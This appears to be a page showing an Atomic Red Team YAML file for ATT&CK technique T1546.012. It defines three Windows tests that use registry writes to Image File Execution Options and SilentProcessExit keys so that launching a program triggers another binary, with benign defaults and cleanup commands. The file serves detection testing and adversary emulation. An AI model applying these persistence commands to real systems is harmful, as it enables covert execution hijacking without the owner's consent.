security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1546.012/T1546.012.yaml
T
Josh Rickard a5dd0813cd fix: Updating atomics YAML file structure to align with the new JSON schema definition (#2323) 
* fix: Updating atomics YAML file structure to align with the new JSON schema definition.

This also fixes some white space issues and general line formatting across all impacted atomics.

* fix: One additional change needed

---------

Co-authored-by: MSAdministrator <MSAdministrator@users.noreply.github.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2023-02-13 16:10:37 -07:00

95 lines
4.4 KiB
YAML
Raw Permalink Blame History

attack_technique: T1546.012
display_name: 'Event Triggered Execution: Image File Execution Options Injection'
atomic_tests:
- name: IFEO Add Debugger
auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8
description: |
Leverage Global Flags Settings
supported_platforms:
- windows
input_arguments:
target_binary:
description: Binary To Attach To
type: path
default: calc.exe
payload_binary:
description: Binary To Execute
type: path
default: C:\Windows\System32\cmd.exe
executor:
command: |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
cleanup_command: |
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: IFEO Global Flags
auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1
description: |
Leverage Global Flags Settings
supported_platforms:
- windows
input_arguments:
target_binary:
description: Binary To Attach To
type: path
default: notepad.exe
payload_binary:
description: Binary To Execute
type: path
default: C:\Windows\System32\cmd.exe
executor:
command: |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}"
cleanup_command: |
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: GlobalFlags in Image File Execution Options
auto_generated_guid: 13117939-c9b2-4a43-999e-0a543df92f0d
description: |
The following Atomic Test will create a GlobalFlag key under Image File Execution Options, also a SilentProcessExit Key with ReportingMode and MonitorProcess values. This test is similar to a recent CanaryToken that will generate an EventCode 3000 in the Application log when a command, whoami.exe for example, is executed.
Upon running Whoami.exe, a command shell will spawn and start calc.exe based on the MonitorProcess value.
Upon successful execution, powershell will modify the registry and spawn calc.exe. An event 3000 will generate in the Application log.
supported_platforms:
- windows
input_arguments:
process:
description: |
Process to monitor
type: string
default: whoami.exe
cmd_to_run:
description: |
Command to execute
type: string
default: cmd.exe /c calc.exe
executor:
command: |
$Name = "GlobalFlag"
$Value = "512"
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{process}"
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $Name -Value $Value -PropertyType DWord -Force
$Name = "ReportingMode"
$Value = "1"
$SilentProcessExit = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{process}"
New-Item -Path $SilentProcessExit -Force
New-ItemProperty -Path $SilentProcessExit -Name $Name -Value $Value -PropertyType DWord -Force
$Name = "MonitorProcess"
$Value = "#{cmd_to_run}"
New-ItemProperty -Path $SilentProcessExit -Name $Name -Value $Value -PropertyType String -Force
Start-Process whoami.exe
cleanup_command: |
$SilentProcessExit = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{process}"
Remove-Item $SilentProcessExit -force
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{process}"
Remove-Item $registryPath -force
name: powershell
elevation_required: true
Reference in New Issue View Git Blame Copy Permalink